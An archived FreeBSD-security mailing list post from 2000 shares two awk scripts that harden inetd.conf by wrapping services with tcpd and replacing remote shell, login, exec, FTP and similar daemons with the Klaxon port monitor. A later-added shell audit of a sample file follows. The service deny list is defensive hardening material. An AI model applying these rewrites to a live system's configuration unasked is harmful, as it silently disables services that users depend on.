> IP Blocks? (or hostnames)? thanks again!

E.g. skey_access can do this for you.
--
Volker Stolz * stolz@i2.informatik.rwth-aachen.de * PGP + S/MIME

From owner-freebsd-security Sat Sep 16 9:32:45 2000
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id E28ED37B42C for ; Sat, 16 Sep 2000 09:32:39 -0700 (PDT)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id JAA11095 for ; Sat, 16 Sep 2000 09:32:39 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda11089; Sat Sep 16 09:32:25 2000
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id JAA71830 for ; Sat, 16 Sep 2000 09:32:25 -0700 (PDT)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdz71827; Sat Sep 16 09:32:16 2000
Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e8GGWGO42682 for ; Sat, 16 Sep 2000 09:32:16 -0700 (PDT)
Message-Id: <200009161632.e8GGWGO42682@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdK42677; Sat Sep 16 09:31:42 2000
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.1-RELEASE
X-Sender: cy
To: freebsd-security@freebsd.org
Subject: Option 3
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Sat, 16 Sep 2000 09:31:41 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

A blind carbon copy of this note has been sent to freebsd-arch for those
who have subscribed to freebsd-arch and are not subscribed to
freebsd-security.

Here is the script I alluded to in Option 3 in the freebsd-arch discussion
about Rsh/Rlogin/Rcmd & friends. I've used various forms of this script
for over 7 years on various UNIX platforms. Use it and modify it as you
see fit. It uses Klaxon, a port monitor, to replace and monitor disabled
services. You can disable the service without the use of Klaxon.
Enclosed are two versions of the script, a civilized version and a
Draconian version.

Version 1:

#!/usr/bin/awk -f
# Wrap every active, non-internal service that is not already behind tcpd
# (and is not identd) with tcpd; the original line is kept as a "#==#" comment.
$1 !~ /^#/ && $6 != "internal" && $6 !~ /tcpd/ && $6 ~ /sbin/ && $7 !~ /identd/ {print "#==# " $0; print $1 "\t" $2 "\t" $3 "\t" $4 "\t" $5 "\t/usr/local/etc/tcpd\t" $7 "\t" $8 " " $9}
$1 !~ /^#/ && $6 != "internal" && $6 !~ /tcpd/ && $6 !~ /sbin/ && $7 !~ /identd/ {print "#==# " $0; print $1 "\t" $2 "\t" $3 "\t" $4 "\t" $5 "\t/usr/local/etc/tcpd\t" $6 "\t" $8 " " $9}
# Disable the inetd-internal services except time.
$1 != "time" && $6 == "internal" {print "#==# " $0}
$1 == "time" {print $0}
# Comments, already-wrapped services and identd pass through unchanged.
$1 ~ /^#/ || $6 ~ /tcpd/ || $7 ~ /identd/ {print $0}

Version 2:

#!/usr/bin/awk -f
# Replace the listed services with klaxon (which only records the connection
# attempt); "next" stops the line from also being tcpd-wrapped by the rules
# below, which would leave two active entries for the same service.
$1 !~ /^#/ && $6 != "internal" && $6 !~ /tcpd/ &&
  ( $6 ~ /ftpd/ || $6 ~ /telnetd/ || $6 ~ /rshd/ || $6 ~ /rlogind/ ||
    $6 ~ /rexecd/ || $6 ~ /uucpd/ || $6 ~ /fingerd/ || $6 ~ /tftpd/ ||
    $6 ~ /talkd/ || $6 ~ /rstatd/ || $6 ~ /rusersd/ || $6 ~ /walld/ ||
    $6 ~ /bootps/ || $6 ~ /bootpd/ ) {print "#==# " $0; print $1 "\t" $2 "\t" $3 "\t" $4 "\t" $5 "\t/usr/local/libexec/klaxon.ident\tklaxon " $1; next}
# Everything else that is active and not internal gets wrapped with tcpd.
$1 !~ /^#/ && $6 != "internal" && $6 !~ /tcpd/ && $6 ~ /sbin/ {print "#==# " $0; print $1 "\t" $2 "\t" $3 "\t" $4 "\t" $5 "\t/usr/local/etc/tcpd\t" $7 "\t" $8 " " $9}
$1 !~ /^#/ && $6 != "internal" && $6 !~ /tcpd/ && $6 !~ /sbin/ {print "#==# " $0; print $1 "\t" $2 "\t" $3 "\t" $4 "\t" $5 "\t/usr/local/etc/tcpd\t" $6 "\t" $8 " " $9}
# Internal services are replaced with klaxon as well.
$1 !~ /^#/ && $6 == "internal" {print "#==# " $0; print $1 "\t" $2 "\t" $3 "\t" $4 "\t" $5 "\t/usr/local/libexec/klaxon.ident\tklaxon " $1}
$1 ~ /^#/ || $6 ~ /tcpd/ {print $0}

Regards,                          Phone:  (250)387-8437
Cy Schubert                         Fax:  (250)387-5766
Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC
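A rewrite like the two scripts above is only as good as the inetd.conf it leaves behind, so the check below is worth running afterwards. It is an added example, not part of Cy Schubert's scripts: a POSIX shell function that prints every still-active service whose server program is neither tcpd nor klaxon, i.e. the set both versions are meant to leave empty (the time service, which both versions deliberately keep internal, is excluded), plus a count of the "#==#" entries the rewrite disabled. The inetd.conf content is constructed for the example; the tcpd and klaxon.ident paths are the ones the scripts write.

```shell
#!/bin/sh
# Added example: audit an inetd.conf for services that bypass tcpd/klaxon.
# The sample below is constructed, not a real system's file. Lines starting
# with "#==#" are the disabled originals the awk scripts leave as comments.
INETD_SAMPLE='#==# ftp     stream  tcp  nowait  root    /usr/libexec/ftpd               ftpd -l
ftp     stream  tcp  nowait  root    /usr/local/etc/tcpd             ftpd -l
telnet  stream  tcp  nowait  root    /usr/libexec/telnetd            telnetd
#==# shell   stream  tcp  nowait  root    /usr/libexec/rshd               rshd
shell   stream  tcp  nowait  root    /usr/local/libexec/klaxon.ident klaxon shell
time    stream  tcp  nowait  root    internal
daytime stream  tcp  nowait  root    internal
#==# finger  stream  tcp  nowait  nobody  /usr/libexec/fingerd            fingerd -s'

# Print the names of services that are active and not wrapped by tcpd or
# klaxon; "time" is allowed to stay internal, as in both scripts.
# An empty result means the rewrite covered everything.
# Usage on a live box: inetd_unwrapped "$(cat /etc/inetd.conf)"
inetd_unwrapped() {
    printf '%s\n' "$1" |
        awk '$1 !~ /^#/ && $6 !~ /tcpd/ && $6 !~ /klaxon/ &&
             !($1 == "time" && $6 == "internal") { print $1 }'
}

# Count the original entries the rewrite disabled (the "#==#" markers).
inetd_disabled_count() {
    printf '%s\n' "$1" | grep -c '^#==# '
}

# Stand-alone run: list the gaps in the constructed sample.
echo "services still reachable without tcpd/klaxon:"
inetd_unwrapped "$INETD_SAMPLE"
echo "entries disabled by the rewrite: $(inetd_disabled_count "$INETD_SAMPLE")"
```

On the sample, telnet (raw telnetd) and daytime (still internal) are reported, and three entries are counted as disabled; on a real system the first list is what the awk scripts missed and what still needs attention.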